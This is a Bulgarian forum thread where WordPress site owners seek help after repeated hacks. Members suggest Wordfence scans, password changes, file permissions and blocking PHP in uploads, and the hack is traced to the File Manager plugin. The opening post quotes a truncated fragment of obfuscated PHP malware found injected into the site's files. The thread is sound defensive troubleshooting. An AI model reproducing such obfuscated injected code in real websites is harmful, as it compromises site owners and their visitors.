Помощ за хакнат сайт - два пъти за седмица!

Kiril

Active Member
Здравейте!
От хостинга получих съобщение за зловреден код в някой файлове по сайта. Сайта не е спирал и нямаше видими проблеми. Изтрих го целия. Сложих нов WP и от стария взех само папка uploads и базата. След това сканираха сайта отново и всичко беше ОК, но 3 дни след това пак ми изпратиха съобщение за 10-тина заразени файлове! Във файловете има добавен много реда код. Ето част от него:

Код:
<?php $w43347e3 = 668;$GLOBALS['v5a47'] = Array();global $v5a47;$v5a47 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['m5687ccb'] = "\x59\x2f\x6f\x4e\x9\x3a\x7c\x40\x25\x73\x6e\x79\x6c\x5e\x62\x32\x4a\x7d\x22\x28\x68\x3c\x39\x46\x2a\x34\x47\x3e\x43\x51\x37\x60\x3b\x58\x3d\x5c\x64\x71\x26\x41\x5d\x57\xa\x31\x6d\x55\x33\xd\x77\x78\x76\x27\x70\x5b\x2c\x44\x67\x74\x4d\x48\x65\x38\x21\x56\x3f\x50\x36\x49\x2e\x7a\x54\x75\x20\x5a\x69\x4b\x42\x7e\x23\x2b\x72\x4c\x29\x61\x45\x53\x6b\x7b\x52\x66\x30\x35\x6a\x63\x24\x5f\x2d\x4f";$v5a47[$v5a47['m5687ccb'][48].$v5a47['m5687ccb'][60].$v5a47['m5687ccb'][25].$v5a47['m5687cc...

Може ли да ме посъветвате, къде да търся дупката? Може ли да има нещо в базата?

Приемам и предложения за платена помощ!
 
Последно редактирано:
Трудна работа да се разбере от къде е.
Пробвай това:

1. Спри тези функции: https://stackoverflow.com/questions/1865020/php-how-to-disable-dangerous-functions/31869925
2. Провери си темата и plug-in-те дали в google пише нещо за тях, дали са хаквани.
3. Оправи си правата на файловете така че да не може да се редактират.
Примерно само root user да може даги редактира.

След като минеш през тези, преинсталирай пак wordpress-a и виж дали ще се оправи проблема, успех!
 
Здравейте, мога да ти дам няколко съвета на сляпо, защото не знам какъв е случая:

1.Сменяш всички пароли на хостинг и сайта
2.Инстлираш Wordfence Security и направи сканиране на файловете
3.BBQ: Block Bad Queries
4.Hide My WP
5.Не ползвай Nulled модули, плащай си за модули

Може още доста неща да се направят, просто на сляпо това.

Поздрави,
Станимир И
 
Четейки написаното предполагам, че ползваш споделен хостинг, а не услуга, която можеш да менажираш сам. В такъв случай не ти, а хостинга трябва да направят проверка отновно:

1. ctime timestamp на списъка със заразените файлове
2. хистограма на логовете (http, ftp, cpanel access) за посочения в т,1 timestamp
3. 99.99 % от случаите се вижда от къде е са дошли пуканките. Може и да са от друг сайт в акаунта ти, чийто файлове и директории са собственост на същото потребителско име.

Като цяло, местенето на uploads не е добра идея, защото много често при RFI атака , php скриптвоете използвани за достъп до останалите php файлоове на WP се качват точно там. Винаги спирам изпълнението на .php с .htaccess или съответната конфигурация , ако се ползва рачличен уеб сървър от Apache, в директория uploads. Това, което правят допълнителните плъгини BBQ, Wordfence Security и Hide My WP можеш да го направиш и през htaccess без да се минава през php и да се чудиш защо сайта започва да се зарежда по-бавно, или започва да разходва прекалено много системни ресурси и бълва грешки 5хх при изчерпване на лимитите.
 
Благодаря на всички!
Днес ще опитам с нова преинсталация, но няма как да не копирам старата папка uploads. Много е голяма и ако трябва да качвам файловете един по един... Има ли начин да я сканирам?

Нямам нулнати неща. Темата ми е Beaver Builder Pro и си я плащам всяка година. Използвам я на още 20-тина сайта и с тях няма проблем.

Списъка с плъгини не е голям:
  • Advanced Order Export For WooCommerce
  • BackWPup
  • Beaver Builder Plugin (Pro Version)
  • Cookie Notice
  • Email download link /този малко ме съмнява/
  • Events Manager
  • Loginizer
  • Product Sales Report for WooCommerce
  • Quick Page/Post Redirect Plugin
  • WooCommerce
  • WooCommerce Authorize.Net Gateway
  • WooCommerce USPS Shipping
  • Wufoo Shortcode Plugin
  • Yoast SEO
Преди първия хак имах плъгин File Manager, който дава достъп до всички файловете на сървъра директно от контролния панел, но го махнах. Освен да е останало нещо от него и при второто хакване да се възползвали?

Домейна ми е през CloudFlare и има Firewall Rules /прикачен/, но явно не помагат!
 

Прикачени файлове

  • Screenshot 2020-09-09 at 8.47.08.png
    Screenshot 2020-09-09 at 8.47.08.png
    215.7 KB · Преглеждания: 22
И мен ми 'хакнаха' 6-7 сайта в който имаше 100-тина файла.
Сваляй Wordfence Security и го настрой да сканира и извън WP директорията. Триеш, сменяш всички пароли, обновяваш плъгини, теми и тн.
 
File Manager беше хакнат миналата семдица на (4.09) + атака към 1 милион сайта който го ползва WordFence - вероятно е много по голяма - вероятно имаш скрити шелл скрикптс в uploads или имаш / качваш още нещо с дупки
 

Прикачени файлове

  • Screenshot from 2020-09-09 10-42-32.png
    Screenshot from 2020-09-09 10-42-32.png
    23.7 KB · Преглеждания: 44
@s1yf0x се оказа прав! Сканирах с WordFence и намери 3-4 .php файла и един май беше .ico със странни имена в папките с картинките в uploads. Изтрих ги.

Явно проблема наистина е дошъл от File Manager, както писа @coolice.
Благодаря ви момчета!


Сканирах отново и изглежда чисто за сега.
:)
 
@s1yf0x се оказа прав! Сканирах с WordFence и намери 3-4 .php файла и един май беше .ico със странни имена в папките с картинките в uploads. Изтрих ги.

Явно проблема наистина е дошъл от File Manager, както писа @coolice.
Благодаря ви момчета!


Сканирах отново и изглежда чисто за сега.
:)
Трябва някаква тема да пуснем със пин като важна, където да има лист от стъпки, през които да мине човек ако му е хакнат wordpress-a
 
Здравейте,
моля Ви за помощ на сайта ми на мястото на рекламите на google adsens когато се гледа през мобилен телефон се показват еротични реклами. От хостинга сканираха и ми писаха ,че не откриват проблем при тях. Аз сложих Wordfence Security сканирах с него и той ми засече: Този файл принадлежи на приставката "Broken Link Checker" версия "1.11.14" е модифициран от файла, който се разпространява от WordPress.org за тази версия. Изтрих плъгина с надеждата нещата да се оправят но уви проблема продължава. Моля дайте съвет как да процедирам от тук нататък стъпка по стъпка.
 
Здравейте,
моля Ви за помощ на сайта ми на мястото на рекламите на google adsens когато се гледа през мобилен телефон се показват еротични реклами. От хостинга сканираха и ми писаха ,че не откриват проблем при тях. Аз сложих Wordfence Security сканирах с него и той ми засече: Този файл принадлежи на приставката "Broken Link Checker" версия "1.11.14" е модифициран от файла, който се разпространява от WordPress.org за тази версия. Изтрих плъгина с надеждата нещата да се оправят но уви проблема продължава. Моля дайте съвет как да процедирам от тук нататък стъпка по стъпка.
Кой е сайта?
 
Здравейте,
моля Ви за помощ на сайта ми на мястото на рекламите на google adsens когато се гледа през мобилен телефон се показват еротични реклами. От хостинга сканираха и ми писаха ,че не откриват проблем при тях. Аз сложих Wordfence Security сканирах с него и той ми засече: Този файл принадлежи на приставката "Broken Link Checker" версия "1.11.14" е модифициран от файла, който се разпространява от WordPress.org за тази версия. Изтрих плъгина с надеждата нещата да се оправят но уви проблема продължава. Моля дайте съвет как да процедирам от тук нататък стъпка по стъпка.
Гледайки на карти и други гадателски техники "виждам" 2 възможни варианта:

- ужилен JS
- инжектиран скрипт в базата данни

за това и скенерите не го засичат, защото не може да се пресъздаде заявка от мобилен браузър с вкл. JS
 
Гледайки на карти и други гадателски техники "виждам" 2 възможни варианта:

- ужилен JS
- инжектиран скрипт в базата данни

за това и скенерите не го засичат, защото не може да се пресъздаде заявка от мобилен браузър с вкл. JSРешението само едно ли е изтриване на всичко и създаване на сайта от начало?
 
Решението да изтриеш всичко и да почнеш от начало е оправдано само тогава, когато почиствавето излиза повече като цена отколкото самия сайт като актив.
 
Здравейте, успях да реша проблема оказа се един пипан плъгин, който изтрих и сега сайта ми е добре. Все пак ако може да напишем полезни съвети защото проблема е сериозен и предполагам доста хора търсят решение. Аз си реших проблема с помощта на

Wordfence Security - Сканиране на защитна стена и злонамерен софтуер

Сканирах с него откри ми плъгин, който е пипан изтрих плъгина и зачаках заради кеша да мине време. На другия ден сайта вече беше добре. Успех на всички!
 
Решението да изтриеш всичко и да почнеш от начало е оправдано само тогава, когато почиствавето излиза повече като цена отколкото самия сайт като актив.
И аз мислех ,като теб да трия всичко и се бях хванал за главата от хостинга не успяха да направят нищо по въпроса и май ще се местя от тях. Много са любезни по 30 мин ми обясняват как няма да станат нещата...
 
И аз мислех ,като теб да трия всичко и се бях хванал за главата от хостинга не успяха да направят нищо по въпроса и май ще се местя от тях. Много са любезни по 30 мин ми обясняват как няма да станат нещата...
Нямаш ни най-малка представа за какво говоря. Прочети го пак :) А относно това, което си написал ти няма да го коментирам, защото ще те откажа от живота като цяло.
 

Горе